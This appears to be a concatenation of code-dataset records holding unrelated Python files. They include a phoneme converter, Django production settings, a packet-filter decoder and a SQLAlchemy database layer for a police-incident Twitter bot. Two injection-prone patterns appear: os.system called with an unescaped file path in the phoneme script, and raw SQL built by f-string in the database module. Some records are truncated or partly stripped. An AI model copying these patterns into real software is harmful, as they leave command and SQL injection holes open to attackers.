nominee_sw, tkn_award]])]\r\n\r\n\t\t\tfor i in range(low, high):\r\n\t\t\t\tfor phrase in helpers.ngrams(clean_tweet, i):\r\n\t\t\t\t\tfront = lower_raw.index(phrase[0])\r\n\t\t\t\t\tback = lower_raw.index(phrase[-1]) + 1\r\n\t\t\t\t\tif is_person and back - front != i:\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\tname = ' '.join(lower_raw[front:back])\r\n\r\n\t\t\t\t\tif name in award:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\tif name in nominee_candidates:\r\n\t\t\t\t\t\tnominee_candidates[name] += 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tnominee_candidates[name] = 1\r\n\r\n\trankings = [(name, v) for name, v in sorted(nominee_candidates.items(), key=lambda item: item[1])]\r\n\trankings.reverse()\r\n\tnominees = [n[0] for n in rankings[:6]]\r\n\r\n\treturn nominees","sub_path":"src/queries/query_nominees.py","file_name":"query_nominees.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438040417","text":"import random\nimport os\n\nmrpa2sampa = {\n 'p': 'p',\n 'b': 'b',\n 't': 't',\n 'd': 'd',\n 'k': 'k',\n 'm': 'm',\n 'n': 'n',\n 'l': 'l',\n 'r': 'r',\n 'f': 'f',\n 'v': 'v',\n 's': 's',\n 'z': 'z',\n 'h': 'h',\n 'w': 'w',\n 'g': 'g',\n 'ch': 'tS',\n 'jh': 'dZ',\n 'ng': 'N',\n 'th': 'T',\n 'dh': 'D',\n 'sh': 'S',\n 'zh': 'Z',\n 'y': 'j',\n 'ii': 'i:',\n 'aa': 'A:',\n 'oo': 'O:',\n 'uu': 'u:',\n '@@': '3:',\n 'i': 'I',\n 'e': 'e',\n 'a': '{',\n 'uh': 'V',\n 'o': 'Q',\n 'u': 'U',\n '@': '@',\n 'ei': 'eI',\n 'ai': 'aI',\n 'oi': 'OI',\n 'ou': '@U',\n 'au': 'aU',\n 'I@': 'I@',\n 'e@': 'e@',\n 'u@': 'U@'\n}\n\n'''\nMRPA SAMPA Example\np p put\nb b but\nt t ten\nd d den\nk k can\nm m man\nn n not\nl l like\nr r run\nf f full\nv v very\ns s some\nz z zeal\nh h hat\nw w went\ng g game\nch tS chain\njh dZ Jane\nng N long\nth T thin\ndh D then\nsh S ship\nzh Z measure\ny j yes\nii i: bean\naa A: barn\noo O: born\nuu u: boon\n@@ 3: burn\ni I pit\ne e pet\na { pat\nuh V putt\no Q pot\nu U good\n@ @ about\nei eI bay\nai aI buy\noi OI boy\nou @U no\nau aU now\nI@ I@ peer\ne@ e@ pair\nu@ U@ poor\n'''\ndef text2phn(text_path):\n os.system('perl transcribe.pl \"%s\"' % text_path)\n trans = '/tmp/trans.txt'\n f = open(trans,'r')\n fpho = open(trans+'.pho','w')\n lines = f.readlines()\n for line in lines:\n for letter in line.split(' '):\n l = letter.strip()\n if l =='': l='_'\n if l =='i': l='aI'\n if l =='oo': l='O:'\n if l=='@@': l='3:'\n if l=='a': l='{'\n try: l = mrpa2sampa[l]\n except: pass\n\n if l:\n if l=='_':\n dur = 100\n freq = 100\n percent = 100\n fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n #fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n #fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n else:\n # chinglish\n # dur = random.randint(50,250)\n # freq = random.randint(50,300)\n\n # \n dur = random.randint(50,100)\n freq = random.randint(100,200)\n #dur = 100\n #freq = 100\n #percent = 100\n fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n fpho.close()\n f.close()\n'''\ndef text2phn(text_path='test.txt'):\n maxPhnNameLen=4; # max number of char in a phoneme name\n silencePhn='_';\n #while(len(silencePhn)0):\n # phn+='__'\n\n phonemes+=phn\n\n phn='_'\n #while (len(phn)'''\n# content+=''''''\n content=''''''\n return content\n","sub_path":"end/cgi-bin/singlecomment.py","file_name":"singlecomment.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"279409475","text":"import os\n\nfrom .settings import *\n\nMEDIA_ROOT = STORAGE_ROOT\n\nSITE_ID = int(os.getenv(\"SITE_ID\") or \"1\")\n\nDEFAULT_FILE_STORAGE = 'contentcuration.utils.gcs_storage.GoogleCloudStorage'\nSESSION_ENGINE = \"django.contrib.sessions.backends.db\"\n\n# email settings\nEMAIL_BACKEND = 'postmark.django_backend.EmailBackend'\nPOSTMARK_API_KEY = os.getenv(\"EMAIL_CREDENTIALS_POSTMARK_API_KEY\")\n\nLANGUAGE_CODE = os.getenv(\"LANGUAGE_CODE\") or \"en\"\n\n# Google drive settings\nGOOGLE_STORAGE_REQUEST_SHEET = \"1uC1nsJPx_5g6pQT6ay0qciUVya0zUFJ8wIwbsTEh60Y\"\nGOOGLE_AUTH_JSON = os.getenv(\"GOOGLE_DRIVE_AUTH_JSON\") or GOOGLE_AUTH_JSON\n\nkey = (os.getenv(\"SENTRY_DSN_KEY\")\n .strip()) # strip any possible trailing newline\nrelease_commit = os.getenv(\"RELEASE_COMMIT_SHA\")\nif key and release_commit:\n RAVEN_CONFIG = {\n 'dsn': 'https://{secret}@sentry.io/1252819'.format(secret=key),\n # If you are using git, you can also automatically configure the\n # release based on the git info.\n 'release': release_commit,\n 'environment': os.getenv(\"BRANCH_ENVIRONMENT\"),\n }\n","sub_path":"contentcuration/contentcuration/production_settings.py","file_name":"production_settings.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"249144022","text":"import os\nfrom tqdm import tqdm\nimport pickle\nimport shutil\n\ndata = pickle.load(open('./data/sentence_gamjung.pkl', 'rb'))\ndata_dir = 'data'\ntrain_dir = 'train_data'\nif os.path.exists(train_dir):\n\tprint('Directory already exists.')\n\texit()\n\nos.makedirs(train_dir)\nfor path in tqdm(data['image_path']):\n\tdir_path = train_dir + '/' + path.split('/')[0]\n\tif not os.path.exists(dir_path):\n\t\tos.makedirs(dir_path)\n\tshutil.copy(data_dir + '/' + path, train_dir + '/' + path)\n","sub_path":"make_train_dataset.py","file_name":"make_train_dataset.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"440393222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 21 14:46:42 2020\r\n\r\n@author: tanta\r\n\"\"\"\r\n\r\na=input(\"địa chỉ email muốn gửi thư: \")\r\nb=input(\"thông điệp gửi thư: \")\r\nc=input(\"số lần gửi thư: \")\r\ncounter=1\r\nn=int(input(\"nhập vào số lần lặp: \"))\r\nwhile counter <= n: \r\n counter=counter+1\r\n print(\"địa chỉ email muốn gửi thư: \",a)\r\n print(\"thông điệp muốn gửi thư: \",b)\r\n print(\"số lần gửi thư: \",c)","sub_path":"bài 8(chương 4).py","file_name":"bài 8(chương 4).py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"204487565","text":"import random\n\ndef main():\n casos = 200\n file = open(\"input2.in\",\"w+\")\n file.write(str(casos)+\"\\n\")\n for x in range(casos):\n file.write(str(30000)+\"\\n\")\n word = \"\"\n for y in range(30000):\n v = random.randrange(2)\n if v == 0:\n word += \"(\"\n else:\n word += \")\"\n file.write(word+\"\\n\")\n file.write(str(100)+\"\\n\")\n for y in range(100):\n v = random.randrange(4)\n if (v == 0):\n file.write(\"0\"+\"\\n\")\n else:\n vv = random.randrange(30000)\n file.write(str(vv)+\"\\n\")\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"practicas/oia_selectivo_2015_entrenamiento/extra_problems/Brackets/case_generator.py","file_name":"case_generator.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"190035716","text":"import collections\n\nfrom decoder.field import BasicField, WireField, ComputedField, RepeatingGroup, LookupField, TrimmedString\nfrom decoder.descriptor import Descriptor\n\nfrom decoder.decoder import Decoder, Verbosity\n\n\nclass Decoder(Decoder):\n \"\"\" filter module\n\n This module filters output streams\n\n \"\"\"\n\n def __parse_options(self, opts):\n self.__start_sequence = opts.get('start-sequence', None)\n self.__end_sequence = opts.get('end-sequence', None)\n self.__allow_unsequenced = opts.get('allow-unsequenced', False)\n self.__required_keys = None\n if 'required-keys' in opts:\n self.__required_keys = opts['required-keys'].split(',')\n self.__sent_keys = None\n if 'send-keys' in opts:\n self.__sent_keys = [x.strip() for x in opts['send-keys'].split(',')]\n self.__keyvals = []\n if 'keyvals' in opts:\n for keyval in opts['keyvals'].split(','):\n pair = keyval.split('=')\n self.__keyvals.append(pair)\n self.__allowed_modules = None\n if 'modules' in opts:\n self.__allowed_modules = opts['modules'].split(',')\n\n\n\n def __init__(self, opts, next_decoder):\n super(Decoder, self).__init__('output/filter', opts, next_decoder)\n self.__parse_options(opts)\n # init summary data\n self.__filtered_messages = 0\n self.__allowed_messages = 0\n self.__total_messages = 0\n\n def on_message(self, context, payload):\n \"\"\" incoming packet and filter the output\n\n :rtype : none\n :param context: Message context build by preceding link in decoder chain\n :param payload: Message payload\n \"\"\"\n\n self.__total_messages += 1\n allow = True\n\n # check to see if the sequence number is filtered\n cur_sequence = context.get('sequence-number', None)\n if cur_sequence is not None:\n if self.__start_sequence is not None:\n if cur_sequence < self.__start_sequence:\n allow = False\n if self.__end_sequence is not None:\n if cur_sequence > self.__end_sequence:\n allow = False\n else:\n if self.__allow_unsequenced == False:\n allow = False\n\n # check to see if we're allowing only messages with specific key-value pairs\n if allow == True and len(self.__keyvals) is not 0:\n for key, val in self.__keyvals:\n if key not in context:\n allow = False\n elif val != context[key]:\n allow = False\n\n # check to see if we're allowing only messages with specific keys\n if allow == True and self.__required_keys is not None:\n for key in self.__required_keys:\n if key.strip() not in context:\n allow = False\n\n if allow:\n self.__allowed_messages += 1\n # filter in only allowed-keys, if specified\n if self.__sent_keys is not None:\n filteredContext = collections.OrderedDict()\n for key in self.__sent_keys:\n if key.strip() in context:\n filteredContext.update({key.strip(): context[key.strip()]})\n context = filteredContext\n # filter in explicitly allowed modules\n if self.__allowed_modules is not None:\n filteredContext = collections.OrderedDict()\n for key, value in context.iteritems():\n keymod = key.split('-')[0]\n if keymod in self.__allowed_modules:\n filteredContext.update({key: value})\n context = filteredContext\n\n if context:\n self.dispatch_to_next(context, payload)\n else:\n self.__filtered_messages += 1\n\n\n\n\n def summarize(self):\n \"\"\" Provides summary statistics from this Decoder\n \"\"\"\n return {\n \"filter-filtered\": self.__filtered_messages,\n \"filter-allowed\": self.__allowed_messages,\n \"filter-total\": self.__total_messages\n }\n\n\n","sub_path":"decoder/output/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"291773892","text":"\"\"\"\nThis module should should hold everything related to the database including:\n- Connections\n- Queries\n- Bot Scripts\n\nDeclarative_base:\nhttps://docs.sqlalchemy.org/en/13/orm/extensions/declarative/api.html#sqlalchemy.ext.declarative.declarative_base\n\nSessions:\nhttps://docs.sqlalchemy.org/en/14/orm/session_basics.html#using-a-sessionmaker\n\nScoped session:\nhttps://docs.sqlalchemy.org/en/14/orm/contextual.html\n\nTyping:\nhttps://docs.python.org/3/library/typing.html\n\n\"\"\"\n\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.sql.expression import table\n# from app.main import activate\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom sqlalchemy.orm import relationship, sessionmaker, scoped_session\n\nfrom dotenv import load_dotenv, find_dotenv\nfrom random import random as rand\nimport os\n\nfrom sqlalchemy import create_engine, inspect, select, update, func, and_\nfrom sqlalchemy import Column, Integer, String, Date, Float, Boolean, ForeignKey\n\nfrom typing import List, Dict\n\nload_dotenv(find_dotenv())\n\ndb_url = os.getenv(\"DB_URL\")\n\n# connects to database for SQL operations,echo generates the activity log\nengine = create_engine(db_url, echo=True)\n\n# describes db tables and defines classes that will be mapped to those tables\nBase = declarative_base()\n\n\nclass ForceRanks(Base):\n \"\"\"\n Describe the Postgres table AND\n maps a path to those tablesn\n \"\"\"\n __tablename__ = \"force_ranks\" # name formatting has to be this way\n\n incident_id = Column(\n Integer, # defines column type\n primary_key=True, # assigns primary key\n nullable=False,\n unique=True)\n incident_date = Column(Date, nullable=False)\n tweet_id = Column(String(255))\n user_name = Column(String(255))\n description = Column(String(10000), nullable=False)\n city = Column(String(255), default=None)\n state = Column(String(255), default=None)\n lat = Column(Float)\n long = Column(Float)\n title = Column(String(255), default=None)\n force_rank = Column(String(255), default=None)\n status = Column(String(255), default='pending', nullable=False)\n confidence = Column(Float)\n tags = Column(String(255))\n src = Column(String(8000))\n children = relationship(\"Conversations\", back_populates=\"parent\")\n\n def __repr__(self):\n return \"incident_id:{}, incident_date:{}, tweet_id:{}, user_name:{}, description:{}, city:{}, state:{}, lat:{}, long:{}, title:{}, force_rank:{}, status:{}, confidence:{}, tags:{}, src:{}\".format(\n self.incident_id,\n self.incident_date,\n self.tweet_id,\n self.user_name,\n self.description,\n self.city,\n self.state,\n self.lat,\n self.long,\n self.title,\n self.force_rank,\n self.status,\n self.confidence,\n self.tags,\n self.src\n )\n\n\nclass Conversations(Base):\n __tablename__ = \"conversations\"\n\n id = Column(Integer, primary_key=True)\n incident_id = Column(Integer, ForeignKey('force_ranks.incident_id'))\n tweet_id = Column(String(255))\n form = Column(Integer)\n root_tweet_city = Column(String(255))\n root_tweet_state = Column(String(255))\n root_tweet_lat = Column(Float)\n root_tweet_long = Column(Float)\n root_tweet_date = Column(Date)\n root_tweet_force_rank = Column(String(255), default=None)\n sent_tweet_id = Column(String)\n received_tweet_id = Column(String)\n in_reply_to_id = Column(String)\n tweeter_id = Column(String)\n conversation_status = Column(Integer)\n tweet_text = Column(String)\n checks_made = Column(Integer)\n reachout_template = Column(String)\n isChecked = Column(Boolean)\n parent = relationship(\"ForceRanks\", back_populates=\"children\")\n\n def __repr__(self):\n return (\n \"id:{}, tweet_id:{}, form:{}, root_tweet_city:{}, root_tweet_state:{}, root_tweet_lat:{}, root_tweet_long:{}, root_tweet_date:{}, root_tweet_force_rank:{}, sent_tweet_id:{}, received_tweet_id:{}, in_reply_to_id:{}, tweeter_id:{}, conversation_state:{}, tweet_text:{}, checks_made:{}, reachout_template:{}, isChecked:{}\").format(\n self.id,\n self.tweet_id,\n self.form,\n self.root_tweet_city,\n self.root_tweet_state,\n self.root_tweet_lat,\n self.root_tweet_long,\n self.root_tweet_date,\n self.root_tweet_force_rank,\n self.sent_tweet_id,\n self.received_tweet_id,\n self.in_reply_to_id,\n self.tweeter_id,\n self.conversation_status,\n self.tweet_text,\n self.checks_made,\n self.reachout_template,\n self.isChecked\n )\n\n\nclass Training(Base):\n __tablename__ = \"training\"\n\n id = Column(Integer, primary_key=True)\n tweets = Column(String)\n labels = Column(Integer)\n\n def __repr__(self):\n return (\n \"id:{}, tweets:{}, labels:{}\"\n ).format(self.id, self.tweets, self.labels)\n\n\nclass BotScripts(Base):\n __tablename__ = \"bot_scripts\"\n\n script_id = Column(\n Integer, primary_key=True, nullable=False, unique=True)\n script = Column(String(255))\n convo_node = Column(Integer)\n use_count = Column(Integer)\n positive_count = Column(Integer)\n # success_rate = Column(Float)\n active = Column(Boolean)\n\n\n def __repr__(self):\n # positive_count:{}, success_rate:{}\n return (\n \"script_id:{}, script:{}, convo_node:{}, use_count:{}, positive_count:{}, success_rate:{}, active:{}\"\n ).format(\n self.script_id,\n self.script,\n self.convo_node,\n self.use_count,\n self.positive_count,\n #self.success_rate,\n self.active\n )\n\n\n def add_script(self, data):\n \"\"\"\n Updates the bot_scripts table with new row passing the given script\n and indicated conversation node into their respective columns. Sets the\n 'use_count' and 'positive_count' columns for this row to the default\n of 0,'success_rate' column defaults to 0.0, and 'active' defaults True.\n Auto generates a new 'script_ID' incrementally for scripts all\n conversation nodes except 'welcome' which will need to use a helper\n function which authenticates the welcome message with\n Twitter and generates a different ID.\n \"\"\"\n\n if data.script_id != 0:\n # data['script_id'] = # Use id from Twitter auth function (to be written or grabbed from Brody O.)\n pass\n else:\n # data['script_id'] = # Auto generate the next incremental id\n pass\n\n # Database.insert_script(data)\n\n def activate_script(script_id):\n script_id = int(script_id)\n db = Database()\n \n # Data is a BotScripts class obj\n data = db.get_table(BotScripts, BotScripts.script_id, script_id)[-1][-1]\n \n if data.active == True:\n data.active = False\n else:\n data.active = True\n \n with db.Sessionmaker() as session: \n session.add(data)\n session.commit()\n\n\n def add_to_use_count(script_id):\n \"\"\"\n Uses functions from db.py as helper to increment the use_count\n \"\"\"\n old_count = Database.get_table(BotScripts.use_count, BotScripts.script_id, script_id)\n print(old_count)\n new_count = old_count[0][0] + 1\n Database.bump_use_count(script_id, new_count)\n\n def add_to_positive_count(script_id):\n \"\"\"\n Uses functions from db.py as helper to increment the positive_count\n \"\"\"\n data = Database.get_counts(script_id)\n use = data[0][0]\n pos = data[0][1]\n\n pos += 1\n rate = pos / use\n Database.update_pos_and_success(script_id, pos, rate)\n\n # Functions for selection of scripts\n \"\"\" FUTURE update: add randomized functionality to choose between path-based\n script selection based on traning from the 'script_training' and path\n -generating options (the latter exist below). Possibly set this up to occur\n automatically whence results from traing sessions of path-based data are\n available.\n\n Also consider setting up testing to occur automatically whence\n sufficient training data becomes available. Also consider scheduling\n automatic training per a given number of data points received thereafter.\n Reccomend having said training take place on another optional instance\n (with the bot sentiment analysis) as memory on current instance is running\n low.\n \"\"\"\n\n def choose_script(self, status):\n \"\"\"\n Used to select a script for use by the twitter bot given a\n conversation node.\n Returns a tuple containing the script and its id to be used by the\n Twitter bot.\n The script for the conversation and the script_id to be used in\n another two function calls within the bot to update\n the use_count in 'bot_scripts' when the bot send the message\n as well as updating the path in 'script_testing' a\n fter the bot pairs this script_id with an incident_id.\n\n -----\n In a future implementation try switching between\n choosing a random script and\n choosing the better of two as originally coded.\n -----\n\n \"\"\"\n\n # Pull the list of scripts for a convo_node given\n script_data = Database.get_scripts_per_node(\n self.convo_node_dict[status])\n\n # Randomly select two script objects\n l = len(script_data)\n x = int(str(rand())[-6:])\n y = int(str(rand())[-6:])\n a = x % l\n b = y % l\n\n # conditional for selecting the best of two when count is achieved\n if script_data[a][2] > 100 and script_data[b][2] > 100:\n if script_data[a][3] >= script_data[b][3]:\n use = a\n else:\n use = b\n else:\n if x >= y:\n use = a\n else:\n use = b\n\n return (script_data[use][0], script_data[use][1])\n\nclass ScriptTesting(Base):\n __tablename__ = \"script_testing\"\n\n incident_id = Column(\n Integer, primary_key=True, nullable=False, unique=True)\n\n script_path = Column(String(100))\n success = Column(Boolean)\n\n def __repr__(self):\n return (\n \"incident_id:{}, script_path:{}, success:{}\"\n ).format(\n self.incident_id,\n self.script_path,\n self.success\n )\n\n\nclass Sources(Base):\n __tablename__ = \"sources\"\n\n source_id = Column(Integer, primary_key=True, nullable=False, unique=True)\n incident_id = Column(Integer, ForeignKey(\"force_ranks.incident_id\"))\n source = Column(String(255))\n\n def __repr__(self):\n return (\n \"source_id:{}, incident_id:{}, sources:{}\"\n ).format(\n self.source_id,\n self.incident_id,\n self.source\n )\n\n\nclass Tags(Base):\n __tablename__ = \"tags\"\n\n tags_id = Column(Integer, primary_key=True, nullable=False, unique=True)\n incident_id = Column(Integer, ForeignKey(\"force_ranks.incident_id\"))\n tag = Column(String(40))\n\n def __repr__(self):\n return (\n \"tags_id:{}, incident_id:{}, sources:{}\"\n ).format(\n self.tags_id,\n self.incident_id,\n self.tag\n )\n\n\nclass Database(object):\n\n def __init__(self):\n self.engine = create_engine(\n db_url,\n pool_recycle=3600,\n pool_size=10,\n echo=False,\n pool_pre_ping=True\n )\n\n self.Sessionmaker = scoped_session(\n sessionmaker(\n autoflush=False,\n autocommit=False,\n bind=self.engine\n )\n )\n\n self.TABLE_NAMES = {\"force_ranks\": ForceRanks,\n \"conversations\": Conversations,\n \"bot_scripts\": BotScripts,\n \"script_testing\": ScriptTesting,\n \"tags\": Tags,\n \"sources\": Sources\n }\n\n def get_conversation_root(self, root_id: int):\n \"\"\" Get conversation with a specific root_tweet_id \"\"\"\n with self.Sessionmaker() as session:\n query = select(Conversations).where(\n Conversations.tweet_id == root_id)\n conversations_data = session.execute(query)\n return [i[0] for i in conversations_data.fetchall()]\n\n def get_script_ids(self, convo_node):\n \"\"\"\n Gets the script_ids associated with the given convo_node\n ONLY KEPT FOR FUTURE USE.\n This funtion can be replaced with get_table().\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(BotScripts.script_id).where(\n BotScripts.convo_node == convo_node\n )\n script_ids_data = session.execute(query).fetchall()\n return script_ids_data\n\n def get_script(self, script_id):\n \"\"\"\n Gets a script from 'bot_scripts' table for given script_id(s)\n ONLY KEPT FOR FUTURE USE.\n This funtion can be replaced with get_table().\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(\n BotScripts.script\n ).where(BotScripts.script_id == script_id)\n\n script_data = session.execute(query).fetchall()\n return script_data\n\n def get_all_script_data(self):\n \"\"\"\n ONLY KEPT FOR FUTURE USE.\n This funtion can be replaced with get_table().\n Selects all from 'bot_scripts'\n ---Labs 39 ---> you may need to tailor the output type here for\n populating the Script Management modal, consult you front end peeps\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(BotScripts)\n bot_scripts_data = session.execute(query).fetchall()\n\n return bot_scripts_data\n\n def insert_script(self, new_script):\n \"\"\"\n Updates the bot_scripts table with new row passing the given script\n and indicated conversation node into their respective columns.\n Sets the 'use_count' and 'positive_count' columns for this row\n to the default of 0.'active' column set to True by default.\n Generates a new 'script_ID' unique to this script.\n \"\"\"\n\n with self.Sessionmaker() as session:\n BS = BotScripts()\n BS.script_id = new_script.script_id\n BS.script = new_script.script\n BS.convo_node = new_script.convo_node\n BS.use_count = new_script.use_count\n BS.positive_count = new_script.positive_count\n BS.success_rate = new_script.success_rate\n BS.active = new_script.active\n session.add(BS)\n session.commit()\n\n def get_use_count(self, script_id):\n \"\"\"\n Gets the use_count from 'bot_scripts' for given script_id\n ONLY KEPT FOR FUTURE USE.\n This funtion can be replaced with get_table().\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(\n BotScripts.use_count\n ).where(BotScripts.script_id == script_id)\n\n use_count = session.execute(query).fetchall()\n\n return use_count\n\n def get_counts(self, script_id):\n \"\"\"\n Gets use_count and positive_count from 'bot_scripts' given script_id\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(\n BotScripts.use_count,\n BotScripts.positive_count,\n ).where(BotScripts.script_id == script_id)\n\n counts = session.execute(query).fetchall()\n\n return counts\n\n def get_sripts_per_node(self, convo_node):\n \"\"\"\n Gets scripts and their ids, use counts and success rates for a given\n conversation node all for the use of the script selection process.\n \"\"\"\n with self.Sessionmaker() as session:\n query = (\n select(BotScripts.script_id,\n BotScripts.script,\n BotScripts.use_count,\n BotScripts.success_rate\n ).where(BotScripts.convo_node == convo_node)\n )\n\n scripts = session.execute(query).fetchall()\n\n return scripts\n\n def bump_use_count(self, script_id, new_count):\n \"\"\" Updates the use_count for a script as identified by script_id \"\"\"\n with self.Sessionmaker() as session:\n count_dict = {\"use_count\": new_count}\n query = (\n update(BotScripts).where(\n BotScripts.script_id == script_id).values(**count_dict)\n )\n\n session.execute(query)\n session.commit()\n\n def update_pos_and_success(self, script_id, positive_count, success_rate):\n \"\"\" Updates the positive_count and success_rate for a given script_id \"\"\"\n with self.Sessionmaker() as session:\n data = {\"positive_count\": positive_count,\n \"success_rate\": success_rate\n }\n query = update(BotScripts).where(\n BotScripts.script_id == script_id\n ).values(**data)\n\n session.execute(query)\n session.commit()\n\n def insert_data_force_ranks(self, data: List[Dict]):\n \"\"\" inserts data into force_ranks \"\"\"\n with self.Sessionmaker() as session:\n last = select(func.max(ForceRanks.incident_id))\n last_value = session.execute(last).fetchall()[0][0]\n for i in range(len(data)):\n if last_value is None:\n last_value = 0\n last_value += 1\n data[i]['incident_id'] = last_value\n if type(data[i]['confidence']) != float \\\n and data[i]['confidence'] is not None:\n data[i]['confidence'] = data[i]['confidence'].item()\n obj = ForceRanks(**data[i])\n session.add(obj)\n session.commit()\n\n def insert_data_conversations(self, data):\n \"\"\" inserts data into conversations \"\"\"\n with self.Sessionmaker() as session:\n last = select(func.max(Conversations.id))\n last_value = session.execute(last).fetchall()[0][0]\n if last_value is None:\n last_value = 0\n if data.id is None:\n last_value += 1\n data.id = last_value\n session.add(data)\n session.commit()\n\n def update_tables(self, data, tweet_id, tablename):\n \"\"\" updates table 'tablename' columns of matching tweet_id \"\"\"\n if tablename == 'ForceRanks':\n table = ForceRanks\n elif tablename == 'Conversations':\n table = Conversations\n else:\n return\n\n query = update(table).where(\n table.tweet_id == str(tweet_id)\n ).values(**data)\n\n with self.Sessionmaker() as session:\n session.execute(query)\n session.commit()\n\n def get_root_twelve(self, root_id):\n \"\"\" gets root_ids with value of 12 \"\"\"\n with self.Sessionmaker() as session:\n query = (select(Conversations).\n filter(and_(Conversations.tweet_id == str(root_id),\n Conversations.conversation_status == 12)))\n check_data = session.execute(query)\n\n return check_data.fetchall()\n\n def get_root_twelve_majority(self, root_id, action):\n \"\"\" gets data on differences on incident id for admin review\"\"\"\n with self.Sessionmaker() as session:\n if action == 0:\n \"\"\"Summarizes the all city, state, and date numbers that are associated with an incident_id\"\"\"\n subjects = ['root_tweet_city', 'root_tweet_state',\n 'incident_date']\n reconcilation_dict = {}\n for index, sub in enumerate(subjects):\n query = f\"\"\"\n select count({sub}), {sub} from \n (select * from conversations \n as c inner join force_ranks \n as fr on c.incident_id = fr.incident_id \n where c.incident_id = {root_id}) as subquery\n group by {sub}\n \"\"\"\n check_data = session.execute(query).fetchall()\n reconcilation_dict[f\"{index}\"] = check_data\n return reconcilation_dict\n elif action == 1:\n \"\"\" Brings all the tweet-ids that are associated with the incident_id \"\"\"\n query = (select(Conversations.tweet_id).\n filter(Conversations.incident_id == root_id))\n data = session.execute(query).fetchall()\n return data\n elif action == 2:\n \"\"\" Brings the total number of incident ids in the conversations table \"\"\"\n query = select(func.count(Conversations.incident_id).filter(\n Conversations.incident_id == root_id))\n data = session.execute(query).fetchall()\n return data\n else:\n return 'Pass 0, 1, 2'\n\n def get_twelves(self):\n \"\"\"\n get all conversations with value of 12\n and corresponding data from force_ranks\n \"\"\"\n with self.Sessionmaker() as session:\n query = (select(Conversations, ForceRanks).\n join(ForceRanks,\n and_(Conversations.tweet_id == ForceRanks.tweet_id,\n Conversations.conversation_status == 12)))\n data = session.execute(query).fetchall()\n\n out = []\n for i in data:\n record = {'tweet_id': i['Conversations'].tweet_id,\n 'city': i['Conversations'].root_tweet_city,\n 'confidence': None,\n 'description': i['ForceRanks'].description,\n 'force_rank': i['Conversations'].root_tweet_force_rank,\n 'incident_date': i['Conversations'].root_tweet_date,\n 'incident_id': i['ForceRanks'].incident_id,\n 'lat': i['Conversations'].root_tweet_lat,\n 'long': i['Conversations'].root_tweet_long}\n try:\n record['src'] = {e: i for (e, i) in enumerate(\n i['ForceRanks'].src.replace('\"', '', ).replace('[',\n '').replace(\n ']', '').split(','))}\n except (KeyError, AttributeError):\n pass\n record['state'] = i['Conversations'].root_tweet_state\n record['status'] = i['ForceRanks'].status\n try:\n record['tags'] = {e: i for (e, i) in enumerate(\n i['ForceRanks'].tags.replace('\"', '', ).replace('[',\n '').replace(\n ']', '').split(','))}\n except (KeyError, AttributeError):\n pass\n print(i['ForceRanks'].tags)\n record['title'] = i['ForceRanks'].title\n record['user_name'] = i['ForceRanks'].user_name\n out.append(record)\n\n return out\n\n def get_to_advance(self):\n \"\"\" gets highest conversation_status row of each tweet_id \"\"\"\n with self.Sessionmaker() as session:\n query1 = select(\n func.max(Conversations.conversation_status).label(\"status\"),\n Conversations.tweet_id\n ).group_by(\n Conversations.tweet_id\n ).cte('wow')\n\n query2 = select(\n Conversations\n ).join(\n query1,\n query1.c.tweet_id == Conversations.tweet_id\n ).filter(\n Conversations.conversation_status == query1.c.status\n )\n\n data = session.execute(query2)\n\n return [i[0] for i in data.fetchall()]\n\n def update_conversation_checks(self, root_id):\n \"\"\" iterates conversation_checks column of matching tweet_id \"\"\"\n query = update(Conversations).where(\n Conversations.tweet_id == str(root_id)\n ).values(checks_made=Conversations.checks_made + 1)\n\n with self.Sessionmaker() as session:\n session.execute(query)\n session.commit()\n\n def convert_invocation_conversations(self, data):\n \"\"\" converts invocation dict to correct column names \"\"\"\n clean_data = Conversations()\n\n clean_data.incident_id = data.incident_id\n clean_data.form = data.form\n clean_data.tweet_id = int(data.tweet_id)\n clean_data.in_reply_to_id = data.user_name\n\n return clean_data\n\n def convert_form_conversations(self, data):\n \"\"\" Converts form dict to correct column names \"\"\"\n clean_data = Conversations()\n\n clean_data.form = 1\n clean_data.incident_id = data.incident_id\n clean_data.tweet_id = int(data.tweet_id)\n clean_data.root_tweet_city = data.city\n clean_data.root_tweet_state = data.state\n clean_data.root_tweet_lat = data.lat\n clean_data.root_tweet_long = data.long\n clean_data.root_tweet_date = data.incident_date\n clean_data.root_tweet_force_rank = data.force_rank\n clean_data.tweeter_id = data.user_name\n\n return clean_data\n\n def initialize_table(self, tablename):\n \"\"\" creates table if not exists and table model exists \"\"\"\n\n if tablename in self.TABLE_NAMES:\n table = self.TABLE_NAMES[tablename]\n else:\n return \"Table model not found\"\n\n 